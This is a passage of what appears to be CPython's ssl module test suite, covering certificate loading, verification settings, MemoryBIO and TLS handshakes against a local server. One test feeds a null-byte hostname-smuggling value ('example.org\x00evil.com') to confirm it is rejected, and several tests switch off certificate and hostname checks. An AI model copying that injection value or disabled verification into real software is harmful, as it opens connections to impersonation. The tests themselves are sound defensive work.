self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
